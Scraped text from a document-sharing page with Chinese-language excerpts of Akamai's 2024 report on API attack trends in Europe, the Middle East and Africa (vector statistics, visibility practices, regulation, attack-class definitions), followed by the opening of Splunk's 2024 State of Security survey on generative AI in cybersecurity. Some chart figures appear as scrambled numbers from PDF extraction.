%0%商业服务商业金融服务非营利/教育公共部门其他数字媒体高科技制药/医疗保健博彩视频媒体游戏社交媒体制造业API 攻击所占百分比74.65.5(.7$.5.7.4.7%5.6%3.8%1.7%1.3%1.2%0.6攻击趋势揭示了 API 威胁:欧洲、中东和非洲地区概况|第 10 卷,第 01 期 2024 年|API 成为攻击重灾区:流量分析 与全球趋势一致的是,过去 12 个月里,HTTP 协议(HTTP)和结构化查询语言注入(SQLi)已成为攻击者对欧洲、中东和非洲地区的 API 发动攻击的主要方式,而对于本地文件包含(LFI),虽然它仍然在 Web 应用程序攻击中占据主导地位,但在本列表中的排名进一步下降(欧洲、中东和非洲地区,图 4)。欧洲、中东和非洲地区:不同媒介的 API 攻击占比2023 年 1 月 1 日 2023 年 12 月 31 日欧洲、中东和非洲地区,图 4:HTTP、SQLi 和 XSS 是与 API 攻击相关度最高的三种攻击媒介;对于 API 攻击来说,LFI 不再是主要的攻击媒介,但攻击者仍然会在针对 Web 应用程序的攻击中积极使用该媒介在欧洲、中东和非洲地区,跨站点脚本攻击(XSS)仍然是攻击者青睐的一种技术,即便对于 API 攻击也是如此,并且命令注入(CMDi)也是主要攻击媒介之一。利用新数据集,我们能够监控 API 中的更多攻击媒介。例如,我们在 2023 年报告中讨论过的服务器端请求伪造(SSRF)是现在新出现的一种攻击媒介。(如需了解攻击媒介定义,请参阅全球报告结尾部分附录。)我们的研究还表明,爬虫程序请求是一个值得关注的领域。在同样的 12 个月报告期内,将近 4 万亿次的可疑爬虫程序请求中有 40%以 API 作为攻击目标。100% %5%0%CMDiXSSHTTPSQLiWPA活动会话WATSSRFLFI数据收集RFIAPI 攻击所占百分比14.5.5.2.2.3.2.1%9.3%9.0%7.2(.0%攻击趋势揭示了 API 威胁:欧洲、中东和非洲地区概况|第 10 卷,第 01 期 232024 年|欧洲、中东和非洲地区概况的相关结论从安全和风险管理的角度来看,API 的防护迫在眉睫。此外,除了现行的法律法规之外,新推进的改革也要求网络安全立法跟上威胁形势的变化步伐,这都使保护 API 变得势在必行。例如,欧盟的通用数据保护条例(GDPR)注重对个人数据的保护,而现在 API 在如何使用和共享此类数据方面处于重要位置。此外,新的网络和信息安全指令(NIS2)专门要求制定强有力的 API 安全计划。欧盟之外的国家/地区(例如,沙特阿拉伯)已出台类似于 GDPR 的数据保护法律,它们规定了处理个人数据的实体的相关义务。此外,在即将发布的支付卡行业数据安全标准(PCI DSS)4.0 版的第 6 节中,特别包含了关于在系统和软件的开发及维护中使用 API 的标准,以降低数据泄露风险。随着监管机构制定相关举措和政策以加强 API 的网络安全标准,必须了解最佳实践和指导原则,这样您就可以将 API 纳入到自己的安全计划中,从而加深了解、加强防御措施并遵循合规要求。如需了解更多信息,请参阅全球 API 安全性 SOTI 报告潜伏在阴影之中:攻击趋势揭示了 API 威胁。攻击趋势揭示了 API 威胁:欧洲、中东和非洲地区概况|第 10 卷,第 01 期 242024 年|提升监测能力:企业 API 资产一年回顾在本报告的开头,我们提到了缺乏对 API 的监测能力所带来的危险,并强调了企业通过安全告警获得的一些见解。在本部分中,我们将展示采用强有力的 API 安全计划如何让您实现不同层次的监测能力,包括:发现了解企业内部的 API 清单 风险审计了解发现的每个 API 的风险状况 行为检测了解正常使用与异常滥用的区别,以检查每个 API 上的主动 威胁 调查和威胁搜寻了解由专业人工威胁搜寻人员发现的潜伏在 API 资产内部的威胁这些监测能力层次不是 API 特有的,但我们发现,由于 API 的快速部署,很多 API 的网络安全完善程度都比不上更成熟的 IT 基础架构。问题是很多 API 都包含可以被利用的敏感数据。与我们合作的企业会对其 API 足迹应用更复杂的 API 安全实践,当这些企业更详细地了解其 API 活动并开始查看态势告警和运行时告警时,他们通常会遵循一种通用模式。1.通过监测能力找到 API“您无法保护自己看不到的东西”是一句古老的谚语,但它同样适用于现在的 API。对于很多提升其 API 活动监测能力的企业来说,最大的意外发现之一是自己的环境中竟然存在如此之多正在运行而未被发觉的影子端点。当恶意 API 或僵尸 API 被发现时,安全团队都会心怀感激之情,因为这让他们发现了隐藏的威胁。通常,API 安全完善之旅的第一步是系统性地发现这些影子 API,并确保每个此类 API 已停用或者进行了正式的文档记录,而且已纳入企业的 API 安全控制措施之中。这有助于直接降低意外 API 滥用的风险并减少其他威胁。通常,我们会在部署 API 安全工具时看到告警数量激增,但随着时间推移,会出现更多的非受管或未授权 API,于是我们便开始发现流程中的漏洞。25潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 2024 年|2.做到有条不紊解决影子 API 的问题后,在对经批准 API 的清单进行合理规划和整理方面仍然有工作要做。这包括按开发、测试和生产等宽泛类别进行细分,以及建立层次结构来确保安全告警和分析有适当的上下文,以便团队了解与 API 相关的风险。对每个 API 进行文档记录是提升监测能力过程的下一步。利用文档,安全团队可以更高效地应对态势告警,因为文档可以将告警带入上下文中,并使告警与他们对应用程序、API 和业务流程的思考方式保持一致。只有制定了活动程度的基准,才能轻松地判断哪些是可疑的活动。3.强化 API 态势企业收到的第一波态势和运行时告警往往会告知一组对其 API 实施的高优先级更改。例如,安全团队通常会查看其最常见的告警类型,并确定相关策略和优先级以降低风险。这包括更正 API 代码中的缺陷并解决配置错误问题,以及在吸取经验教训的基础上实施预防未来漏洞的流程。这将有助于划分渗透测试验证计划的优先顺序,并且可能会告知管理层必要的编码最佳实践,以避免今后出现漏洞。4.加强威胁检测和响应虽然前三个步骤通常会使 API 安全告警的总数呈现总体下降趋势,但随着时间推移,我们偶尔也会看到此数量出现激增。这些激增可能是内部驱动因素引起的,例如对业务模式的广泛更改、获得新功能,或者 API 足迹的增加带来新的漏洞或恶意系统。此外,激增也可能是外部因素引起的,包括攻击者进行的攻击尝试。高效的企业会针对这些激增制定计划,并在出现激增时采取明确的响应程序,将风险和告警数量降至正常水平。他们也会采取措施来持续缩短对主动 API 威胁进行响应、调查、限制以及从中恢复所需要的时间。这可能需要新的技能,具体取决于 API 环境。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 262024 年|5.制定更强的防御策略随着企业增强其防御性 API 安全措施,下一个阶段是采取进攻性方法来实施 API 威胁发现和抵御,以完善防御性措施。这包括制定正式的 API 威胁搜寻准则和节奏,目的是在可能的威胁升级为被动情况之前尽早识别它们。这可能难以实现,因为它需要高度专业化的人才以及将资源与中断驱动型任务相隔离的能力。出于此原因,一些企业会聘请第三方服务提供商(包括 Akamai)来实现此重要功能。图 5 中的匿名示例说明了我们的一位企业客户因此所获得的好处。在 1 月和 2 月,由于该企业采取了一些措施来消除影子 API、开展整顿并对其 API 安全态势进行一些初步改进,威胁风险开始下降。在对 API 资产进行更改时,我们观察到态势告警偶尔会出现峰值。通过其 API 监测能力,该客户快速解决了可能的漏洞,没有让它们继续存在。告警数量2023 年 1 月 1 日 2023 年 12 月 31 日图 5:企业在拥有对 API 环境的监测能力后,API 资产的波动情况便会一目了然,而且告警数量也显著减少告警数量2023 年 1 月 1 日 2023 年 12 月 31 日态势告警随着影子 API 和新出现的 API 漏洞的消除,态势告警数量下降显著。告警1 月2 月3 月4 月5 月6 月7 月8 月9 月10 月11 月12 月随着 API 资产的变化,偶尔会出现态势告警峰值。借助强大的实时监测能力,峰值问题很快得到平息。随着主动威胁搜寻能力的提升,运行时告警呈下降趋势。运行时告警27潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 2024 年|运行时告警数量的可预测性较低,因为它是由外部因素驱动的。但是,也能观察到该数量普遍下降,因为该企业增强了其整体安全态势并提升了主动威胁搜寻能力。我们的结论是,保护 API 不只是 IT 团队的责任。这可能需要新的工具和技能,具体取决于数据敏感度所决定的潜在 API 风险暴露情况。随着新工具的部署,API 防御也成为了负责人需要关注的领域。他们应当针对该领域考虑技能组合和人员需要,并且在很多情况下应当考虑重新分配工程时间或转向托管服务。总体而言,需要跟踪和分析网络安全针对 API 提供支持的工作量,以找出效率低下的情况。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 282024 年|保护 API 领域API 是众多公司正在构建的很多新功能的基础。但在大多数情况下,这些公司要么没有在规划过程中尽早考虑 API 安全,要么其 API 安全水平跟不上新技术的快速部署步伐。因此,在探讨如何制定有效的安全计划时,我们会引用我们很喜欢的网络安全专家灰胡子 Bruce Schneier 的一句话:“当危险来临时,你可能会猝不及防。所以,你唯一能做的就是及早检测和从容应对”。这一理念应当促使我们专注于培养更强的环境感知能力。我们应确保将所有 API 纳入我们的安全计划中,并确保我们主动对其进行攻击、漏洞和滥用监控。我们的渗透测试和红队应该测试身份验证和公开数据的态势,以及 JSON 属性和抓取等运行时问题。这些测试应构建为紫队演习,在这些演习中,安全信息和事件管理团队以及安全运营中心需要验证他们是否检测到攻击并且是否实施了最新流程来减轻相关影响。我们在本报告中回顾的案例分析(会员欺诈和盗刷攻击等)是用于测试计划的理想模板。我们应当使用与编码实践相关的 OWASP 指导来阻止常见攻击。这些主动控制措施以及围绕发现、强化、检测和响应制定有效流程的行动号召,都是制定季度行动计划的重要基础。我们还必须考虑合规问题。虽然现在 API 方面的法律/法规不多,但我们应当利用很多最佳实践和标准来确保我们正在采取正确的措施来保护自己的客户。GDPR 等现行法规包括与 API 相关的规定,PCI DSS v4.0 等新标准也提到了 API,并且 ANSI 等组织将发布相关指导原则。本报告的依据包括我们已抵御的威胁流量,以及我们从客户身上学习到的最佳实践。此外,在我们与客户进行沟通互动时,客户不断告诉我们安全控制措施在少数平台上的整合价值、灵活的人员解决方案对于满足转型目标的必要性,以及监测能力对决策和性能评估的重要意义。我们希望这份报告中的数据能够提供相关见解和可见性,帮助您更新自己的计划并开发最佳实践来保护您的客户。敬请访问我们的安全研究中心,随时了解我们的最新研究资讯。29潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 2024 年|方法 Web 应用程序和爬虫程序攻击 这些数据表示通过我们的 Web 应用程序防火墙(WAF)和爬虫程序管理工具观察到的流量的应用层告警数量。如果在针对受保护的网站、应用程序或 API 的访问请求中检测到恶意负载时,系统就会触发 Web 应用程序攻击告警。如果在针对受保护的网站、应用程序或 API 的访问请求中检测到爬虫程序负载,系统就会触发爬虫程序告警。恶意和良性爬虫程序都可能触发此类爬虫程序警报。警报并不表示攻击已经得手。虽然这些产品允许的定制程度极高,但我们在收集此处提供的数据时,所采用的方式并未考虑受保护资产的定制配置。这些数据来自一个内部工具,专用于分析在 Akamai Connected Cloud 上检测到的安全事件。Akamai Connected Cloud 是一个全球性网络,在 130 多个国家/地区拥有 4,000 多台边缘服务器。我们的安全团队使用这些数据(每月达到 PB 级)来研究攻击,标记恶意行为并将其他情报馈送到 Akamai 解决方案中。该报告中的数据涵盖了从 2023 年 1 月 1 日到 2023 年 12 月 31 日的 12 个月时 间段。2024 年数据更新 值此 10 周年庆之际,我们很高兴地宣布对数据集做出的一些更新!我们的 Web 应用程序和爬虫程序攻击数据集已经进行了数次升级。每种数据的收集方式都进行了革新、精简和优化。我们的见解在广度和深度上都得到了扩展。另外,我们还增加了其他攻击媒介(例如 SSRF)的分类。以 API 端点为目标的攻击识别也已加入到每个数据集。我们很高兴在本期报告中强调其中的部分新改进,并且期待在今年及以后继续分享这些更新,与读者一起庆祝互联网现状/安全性发展的这一里程碑。Akamai API Security 见解特别感谢 Akamai API Security 解决方案工程团队,他们在帮助了解 API 风险方面做出了具有现实意义的贡献,并且还有可能通过我们的 API Security 告警发挥重大影响。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 302024 年|附录 攻击媒介定义活动会话已为客户端标记出攻击流量,并且重复请求将在会话持续期间被阻止命令注入(CMDi)攻击者在现有命令中注入新的项目,以修改解释并使其偏离预期,转向他们选择的行动跨站点脚本攻击(XSS)攻击者在内容中嵌入恶意脚本,以便在向 Web 浏览器提供内容时,使目标软件以用户的权限级别执行脚本数据收集攻击者利用攻击目标在设计或配置以及通信上存在的弱点,使其披露比预期更多的信息;此类攻击的目的通常是收集数据以准备实施另一种类型的攻击,但获取信息的访问权也有可能是攻击者的最终目标HTTP 协议(HTTP)攻击者利用客户端与服务器之间的通信协议中存在的弱点,企图执行非预期的操作;对不同协议类型的攻击可能存在不同的最终攻击目标本地文件包含(LFI)攻击者操纵对目标软件的输入,企图获取文件系统中原本不可访问的区域的访问权,或者可能试图对其进行修改31潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 2024 年|攻击媒介定义远程文件包含(RFI)攻击者加载并执行远程任意代码,随后劫持目标应用程序并迫使其执行自己的指令服务器端请求伪造(SSRF)攻击者滥用服务器的功能,企图读取或更新内部资源结构化查询语言注入(SQLi)攻击者伪造输入字符串,以便当目标软件打算基于用户输入构建 SQL 语句时,使生成的 SQL 语句执行攻击者想要的操作;成功的注入攻击可能会导致信息泄露,并且能够在数据库中添加或修改数据Web 攻击工具(WAT)攻击者主动探测目标,企图获取可能被用于实现恶意目标的信息;通过此类探测行为,攻击者能够从目标获得信息,帮助其针对目标的安全性、配置或潜在漏洞进行推断Web 平台攻击(WPA)以软件平台(云、Web 或应用层)为目标进行的攻击;此类攻击并未纳入其他的攻击组别当中32潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 2024 年|无论您在何处构建内容,以及将它们分发到何处,Akamai 都能在您创建的一切内容和体验中融入安全屏障,从而保护您的客户体验、员工、系统和数据。我们的平台能够监测全球威胁,这使得我们可以灵活调整和增强您的安全格局,让您可以实现 Zero Trust、阻止勒索软件、保护应用程序和 API 或抵御 DDoS 攻击,进而信心十足地持续创新、发展和转型。如需详细了解 Akamai 的云计算、安全和内容交付解决方案,请访问 和 年 3 月。致谢名单编辑与创作Badette Tribbey总编辑Charlotte Pelliccia主笔人(地区)编辑人员James Casey Edward Roberts Steve Winterfeld审稿和主题撰稿Tom Emmons Reuben Koh Rob Lester Richard Meeus Abigail Ojeda Menachem Perlman Yariv Shivek数据分析Chelsea Tuttle营销与发布Georgina Morales Hampe Emily Spinks进一步阅读互联网现状/安全性报告互联网现状/安全性报告由 Akamai 精心呈献,获得了各界的广泛赞誉。请前往以下网址回顾往期报告,并关注即将发布的新报告: Akamai 威胁研究请前往以下网址,了解最新的威胁情报分析、安全报告和网络安全研究的动态: Akamai 徽标。 Akamai 解决方案如需详细了解 Akamai 针对 API 攻击推出的解决方案,请访问我们的“应用程序和 API 安全”页面。扫码关注获取最新CDN前沿资讯潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 332024 年|

    浏览量30人已浏览 发布时间2024-05-17 34页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • Splunk:2024年安全现状报告:驾驭 AI 的竞赛(38页).pdf

    2024 年安全现状报告驯服 AI 的竞赛2024 年安全现状报告|Splunk作为一名从业 20 多年的安全专家和领导者,我见证了这个行业的多次发展。但这次不同。随着生成式 AI 的兴起,网络安全正在成为一个充满机遇和风险的全新领域。在 Splunk 的 2024 年安全现状报告中,我们发现许多 CISO(首席信息安全官)和从业者正在一往无前地探索这条道路。但考虑到新的合规法规及其对 CISO 问责制的影响,他们也不确定未来将面对怎样的情形。在今天的网络环境中,我们希望安全专业人员探索生成式 AI 如何为其韧性构建过程提供支持,同时,声称采用这一技术手段的受访者比例高达惊人的 93%,这说明,许多受访者已经将其视为创新的关键点。他们正在使用生成式 AI 来构建更好的网络防御机制,执行更明智的决策,并填补关键技术的空白。与此同时,至少三分之一的受访者没有制定生成式 AI 策略。他们表达的最大的担忧是什么?各种基于 AI 技术的攻击。与此同时,美国出台了更加严格的事件报告规则。美国证券交易委员会(SEC)和欧盟的 NIS2 正在要求 CISO 群体承担更大的责任。但我们相信,安全专业人员也会发现新的机遇,以便重塑他们的角色和团队。对于广大 CISO 来说,这意味着在董事会中确定优先事项,而对于安全从业者来说,这需要与 ITOps、工程和云团队进行更紧密的合作,以扩大可见性,实现响应时间的最小化,并实现更大的韧性。安全专业人员继续开辟这条新道路的同时,在 Splunk,我们对生成式 AI 可为防御人员提供的潜力感到兴奋,并为安全优先事项成为业务优先事项的速度深受鼓舞。Jason LeeSplunk 首席信息安全官32024 年安全现状报告|Splunk2024 年安全现状报告有些矛盾。尽管安全专业人员的道路困难重重,比如说严格的合规要求、不断升级的地缘政治紧张局势和更复杂的威胁环境,但整个行业还是在取得进展。许多组织表示,与前几年相比,网络安全变得更容易管理。组织之间的协作更多,威胁检测的速度更快,而且大多数组织都具备解决所面临问题所需的能力和资源。但完全胜利仍然难以实现,因为防御人员试图在驯服生成式 AI 的竞赛中超越对手。安全团队担心生成式 AI 会加剧他们多年来通过各种技术手段挫败的攻击的影响,这是可以理解的。我们认为防御人员能够胜任这项任务。生成式 AI 对网络安全的全部影响可能是未知的,但有一种情况我们是确定的:这种竞赛已经开始。不断变化的创新之路目录3 不断变化的创新之路6加入 AI 热潮14 领先组织的构造块18 威胁环境评估23 不断攀升的合规压力27 奋进31 行业数据34 典型国家/地区42024 年安全现状报告|Splunk网络安全逐渐变得越来越容易作为一名防御人员意味着你很少看到自己的劳动成果。人们很自然地会思考:这些方法有用吗?在满足网络安全需求方面,受访者的观点几乎平分秋色:41%的受访者认为这方面的工作变得更容易了,46%的受访者则认为更难了。但总体趋势仍充满希望。自 Splunk 发布 2022 年安全现状报告以来,网络安全管理变得越来越容易。考虑到环境的复杂性和攻击的复杂性,这种看法可能会令人惊讶。但对于拥有完善安全管理机制和流程的组织来说,依靠久经考验的攻击策略,可能更容易领先于威胁行为者。合作可能是网络安全变得越来越容易的原因之一:87%的受访者表示,与一年前相比,他们与其他团队的合作更加紧密。四分之三(75%)的受访者表示,今年将更多地与 IT 运维部门开展合作。此外,54%的受访者正在加深与软件工程部门的合作如果在设计和代码开发阶段早期就开始考虑安全问题,解决漏洞问题就会变得更加易于管理。组织检测威胁的速度也在加快。55%的受访者估计他们检测造成中断的事件的平均检测时间(MTTD)为 14 天或更短。这标志着,与去年相比,这方面已经有了显著的提升,当时只有 28%的受访者估计在同一时间段内检测到此类事件。但与攻击者访问系统所需的时间相比,这一时间仍然过长。在过去两年中,满足网络安全要求更加困难没有更加困难更容易2024 年2022 年2023 年174AfSF%说明:52024 年安全现状报告|Splunk但战斗还没有结束在认为网络安全工作越来越困难的受访者中,38%的受访者认为威胁环境的复杂性是导致这一情况的原因。地缘政治紧张局势和网络战争正在升级。物联网、AI 和多云环境正在以指数方式增加数据量。因此,仍在努力实施基本网络安全管理机制的组织将难以确保更多的资产和端点。他们也将更难防止简单的人为错误,如配置错误,这是今年的头号威胁向量。更加严格的合规性要求也会增加风险,特别是对于现阶段个人需要为组织的违规行为承担责任的安全主管。28%的受访者认为遵守相关法规会让工作变得更加困难。新出台的政府条令只会让工作压力更大。与前几年类似,27%的安全团队难以在解决各种突发状况的同时投入足够的时间来提高网络安全,这表明缺乏长期战略和投入。连串的安全警报也会让局面难以为继26%的受访者认为警报数量过多,应对起来比较麻烦。对 AI 的呼声高于云今年进行的调查中最值得注意的发现之一是,对 AI 的宣传与实际情况相符。近一半(44%)的受访者将 AI 列为 2024 年三大主要举措之一,这一比例超过了云安全。虽然安全团队认识到 AI 的许多好处,但不受法律和政策阻碍的威胁行为者也意识到了这一点。当被问及AI 会让天平偏向防御人员还是对手时,受访者的态度几乎各占一半:45%的受访者预测对手将受益最大,43%的受访者认为防御人员将受益最大。生成式 AI 的迅速崛起激发了 人们对未来的无限遐想,但同样也提出了我们实际将面临何种情形的严重问题。这对 SOC 将意味着什么?组织是否会引入政策来鼓励安全和有效的使用?他们如何在不妨碍创新的情况下执行这些政策?答案正在逐渐明朗。2024 年主流安全措施AI云安全安全分析445 b024 年安全现状报告|Splunk加入 AI 热潮在加利福尼亚淘金热潮期间,成千上万怀揣发财梦的淘金者向西部迁移。同样,在今天的生成式 AI 热潮中,我们看到人们以极快的速度寻找机会,进入一个充满无限可能和危险风险的未知前沿领域。每个人都想找到主矿脉,享受先发优势。这是可能的只是需要一点一点地去挖掘。生成式 AI 的采用速度超过了制定政策的速度业务部门的采用率为 93%安全团队的采用率为 914%的受访者缺乏完整的生成式 AI 策略934%生成式 AI 的前景和可能性生成式 AI 已经成为主流,许多组织正在积极实施这种方案,进而实现业务转型。从在电子商务中提供个性化客户推荐服务,到绘制人类大脑图谱,再到模仿伦勃朗的笔触,生成式 AI 几乎在每个行业都有各种各样的用例。这些不仅仅是猜测。93%的受访者表示,业务线终端用户依赖公共生成式 AI 工具来帮助他们完成工作。这会为安全团队提供更多的工作机会,他们需要确保业务免受数据泄漏等生成式 AI 相关漏洞的影响。即使对其怀疑态度最为坚决的安全专业人士,面对大家对生成式 AI 的乐观态度也会动摇自己的想法。安全团队的采用率几乎与企业的整体采用水平一样高,91%的受访者都在使用公共生成式 AI。更重要的是,他们对生成式 AI 取得的成功持一种支持的态度,46%的受访者表示,生成式AI将为他们的安全团队“改变游戏规则”。驾驭生成式 AI 的竞赛异常激烈,50%的受访者表示,他们的组织正在制定将生成式AI 用于网络安全的正式计划,但该计划尚未完成或在内部达成一致。如果处理得当,安全和创新可以齐头并进。与此同时,我们还想了解来自企业或董事会的压力(或者只是很害怕错过这一热潮而落后)是否正在推动安全团队采用生成式AI。就在两年前,询问组织有多少最终用户正在使用公共生成式 AI 工具几乎是荒谬的,但今天生成式 AI 在业务中的地位举足轻重。Splunk 欧洲、中东和非洲首席技术官,战略顾问 Kirsty Paine”82024 年安全现状报告|Splunk生成式 AI 策略是一个未知领域“快速行动,打破常规”可能听起来违反大多数安全从业者的直觉,但当组织寻求快速创新时,这可能是一种正确的理念。虽然安全团队很少拒绝制定策略的机会,但 34%的组织没有制定生成型 AI 政策,尽管这一技术手段的采用率很高。Splunk SURGe 首席安全策略师 Shannon Davis 表示:“对生成式 AI 的限制过于严格的公司不仅有可能落后于竞争对手,还很容易让自己受到大力推崇这些工具的威胁行为者的攻击。”我们从云计算或物联网技术的应用中吸取的教训告诉我们,缺乏流程和规划可能会给安全团队带来困扰。企业操之过急,盲目跟风的做法导致了不良后果,例如个人信用卡支付的不合规的云服务,或充满软件漏洞的不安全的物联网设备。安全团队必须在创新速度与深思熟虑和可持续的过程之间权衡利弊。强有力的策略源自对一项技术真正意义的深入理解,然而 65%的受访者坦言,他们缺乏关于生成式 AI 的培训。但对组织中的其他人员进行生成式 AI 的相关培训应该不是网络安全团队的唯一负担。“组织应该成立一个跨部门的治理委员会,以一个负责任的 AI 的全面框架来监督 AI 的开发和采用,”Splunk AI 事业部副总裁 Hao Yang 如是说。生成式 AI 的影响是广泛的,因此要搞清楚它,我们需要从多个视角和特殊领域出发。例如,Splunk 的 AI 委员会横跨多个业务部门,包括产品和技术、法务、隐私、安全、人力资源、市场和营销。当然,深思熟虑的安全策略并不一定能转化为万无一失的预防措施,但它们可以大大减少数据泄漏和其他新的漏洞。生成式 AI 必须接受法律监管虽然就目前而言,就像内部监管一样,生成式 AI 的前沿领域仍然相对不受任何可执行法律的控制和监管。但 AI 合规的要求正在开始成形。例如,欧盟的 AI 法案旨在引入基于风险类别的共同监管框架。2023 年,欧洲议会修订了其最初的建议,将生成式 AI 纳入其中,要求其必须符合一定的透明度要求。这些要求包括在数据库中注册基础模型,以及制定和保留技术文档。在美国,拜登政府的 AI 权利法案建议,在与自动化系统通信时,应向用户进行通知,并允许选择退出并与真人互动。这些指导方针可能预示着政府未来的行动。即将出现的政府严格监管的局面可能是 45%的受访者将更好地符合合规要求列为仅次于数据泄露的首要改进方面的原因。要针对这一趋势提前做好应对,就需要重新关注内部合规控制。组织应该成立一个跨部门的治理委员会,以一个负责任的 AI 的全面框架来监督 AI 的开发和采用。Splunk AI 事业部副总裁 Hao Yang”2024 年安全现状报告|Splunk它们会相互抵消防御人员将受益最多 对手受益最大生成式 AI:是敌还是友?生成式 AI 对谁更有优势?受访者各有高见。102024 年安全现状报告|Splunk生成式 AI 用例在实际工作中的表现如何 识别风险 生成式AI 可以通过快速聚合不同的数据集来增强基于风险的警报,进而为安全分析师提供富有语境的警报。大型语言模型(LLM)有助于以远远超出人类能力的速度和效率传递这些信息。识别风险威胁情报分析威胁检测/优先处理安全数据汇总39954%主流生成式 AI 网络安全用例威胁情报分析 LLM 可以确定威胁情报报告中描述的漏洞和 MITRE ATT&CK 技术指标。情报团队可以通过该功能从大量繁重的工作中解脱出来,并能够更快地进行更深入的分析。威胁检测和优先处理 对警报进行优先排序和分类是特别容易受到分析师错误分类、疲劳和人为错误影响的任务。生成式 AI 可以同时处理多个威胁,同时提高准确性。对安全数据进行汇总 生成式AI 可以快速、全面、准确地进行总结,帮助安全团队节省时间并跟上新闻和信息的节奏,例如拜登关于改善美国网络安全的行政命令。生成式 AI 作为保证安全的得力助手人们对生成式 AI 的认识正在快速发展。就在 8 个月前,在我们的 CISO 报告中,只有 17%的受访者认为生成式 AI 将对防御人员有所帮助。现在,几乎一半(43%)的受访者持有相同的看法。越来越多的供应商正在将生成式 AI 纳入他们的产品中,反映这一手段在安全工作流程中的使用,而防御人员也开始看到这种可能性。虽然新出现的生成式 AI 攻击和 AI 中毒的可能性仍然存在,但这些威胁还没有变得普遍。防御人员似乎持有一种乐观的态度,并一致认为生成式 AI 很适合若干网络安全用例,并将威胁情报分析和风险识别视为主要的两个应用场景。112024 年安全现状报告|Splunk解决网络安全技能短缺问题技能熟练的专业人员是任何 SOC 的核心,许多组织仍在应对人才短缺的问题。生成式 AI 可以为解决这一切实的需求提供一些喘息的机会。86%的组织认为,生成式 AI 将帮助他们聘请更多入门级网络安全人才,58%的组织表示,它将帮助他们更快地聘用入门级人才。90%的受访者表示,入门级员工入职后,可以依靠生成式 AI 来帮助自己提升 SOC 技能这可能包括编写 Python 脚本或启动测试环境等基本任务。经验丰富的安全专业人员也可以通过生成式 AI 让自己的工作事半功倍。65%的受访者认为这项技术手段会让使他们的工作更高效,让有经验的从业人员更容易合成各种新闻和信息,并加速研究和检测工程进度。虽然对 AI 取代自己工作的担忧并非完全没有根据大约一半(49%)的受访者表示,生成式 AI 将让一些现有的安全工作岗位消失但它更有可能帮助组织培训新的人才,防止员工出现倦怠情绪。它还可以重新划分网络安全人员的就业格局,因为它可以引入提示工程这样的新工作岗位。的受访者认为它可以帮助组织雇佣更多入门级人才 的受访者认为它将让经验丰富的安全专家更高效86e%生成式 AI 如何缩小技能差距122024 年安全现状报告|Splunk生成式 AI 沦为攻击者的工具安全团队也有理由担心,生成式 AI 会成为对手武器库中的另一个工具。45%的受访者认为,网络攻击者将凭借生成式 AI 在双方的角逐中大获全胜,77%的受访者认为它会将攻击面扩大到令人担忧的程度。同样的攻击,已经不可同日而语生成式 AI 会为全球带来怎样的独特威胁?人们面临的一种可能的情况是,生成式 AI 不会产生立竿见影的奇特效果,而是会放大安全团队已经面临的各种威胁。32%的受访者最担心攻击者使用生成式 AI来优化现有攻击,例如制作更真实的钓鱼邮件或改进恶意脚本。技术较差的机会主义黑客将对生成式AI 加以利用,从而推动社会工程攻击的情况显著增加。28%的受访者担心生成式 AI 还会帮助对手增加现有攻击的数量。内部敌人并非所有 AI 威胁都来自外部;77%的受访者赞同这一观点,即随着生成式 AI 的使用日益增加,我们将面临更多数据泄露的情况。但只有 49%的受访者正在积极采取措施,优先考虑数据泄漏的问题这可能是因为目前还没有很多解决方案来控制进出生成式 AI 工具的数据流。缺乏关于生成式 AI 的培训会加剧这些担忧。如果有 65%的安全管理人员承认,他们不完全理解生成式 AI,我们就可以合理地猜测,非安全角色的人员更是丈二和尚摸不着头脑。如果没有适当的培训,最终用户肯定会犯一些错误,比如将敏感的公司数据导入LLM,而这会让安全团队成为众矢之的。威胁行为者对生成式 AI 的主要用途 让现有攻击更加有效 构建新的攻击类型 侦查 让现有攻击数量增加32#(%这就好像一个问题:您想对抗 1 只马一样大的鸭子,还是 100 只鸭子一样大的马?专注于单个威胁可能更容易管理,但生成式 AI 将产生没有那么明显的情况,作为现有攻击的增力因素。Splunk 欧洲、中东和非洲首席技术官,战略顾问 Kirsty Paine”的受访者表示,机器学习的经验将影响他们未来对生成式 AI 的处理方法932024 年安全现状报告|Splunk生成式 AI 未来展望生成式 AI 将何去何从?没有人能预知未来,但安全团队对传统形式的 AI(如机器学习(ML))加以利用已经有一段时间,93%的受访者表示这些经验将对他们未来的生成式 AI 方案产生影响。许多组织已经尝到了 ML 工具带来的生产效率提升的甜头,其中 92%的组织获得了实质性的好处。但这项技术并不完美,我们需要特别注意:73%的受访者表示,具有传统 AI 和ML 功能的工具可能会产生误报,91%的受访者表示这些工具需要调整。同样,我们需要对生成式 AI 进行监督,以发现和防止可能破坏其价值的错误认知。那些已经用传统 AI 和机器学习建立了坚实基础的先驱们可能会发现自己正处于生成式 AI 采用过程的快车道上。142024 年安全现状报告|Splunk领先组织的构造块在防御威胁的竞赛中,一些组织遵循卓越中心模式建立成熟的网络安全实践方案。2024 年,47%的受访者认为他们的安全方案“非常先进”。我们正在将这一群组归类为领先组织,并会对他们的特有特征和在调查中的回答与那些将他们的方案标记为“正在制定”的群组进行比较。152024 年安全现状报告|Splunk首先,领先组织对自己应对威胁环境的能力充满信心。49%的领先组织表示,管理网络安全要求变得越来越容易,而对于正在制定方案的组织,只有29%的受访者表示有同样的想法。领先组织在其他几个方面的表现也优于那些正在制定方案的组织,描绘了一幅可能被认为是黄金标准的做法的画面。适当地提供资源和授权领先组织不是天生就可以领先;这是它们努力的结果。他们的成功方法可以反映与董事会和业务利益相关者的深度联系、跨部门合作和稳定的投入。领先的安全团队预算积极主动67%的受访者会在未来一到两年内显著增加网络安全支出,而正在制定方案的受访者中,这一比例仅为28%。与企业的密切联系也会为领先组织带来回报。令人印象深刻的是,95%的受访者表示他们有资源和权力来应对挑战,这反映了我们在 CISO 报告中的发现,47%的 CISO现在直接向 CEO 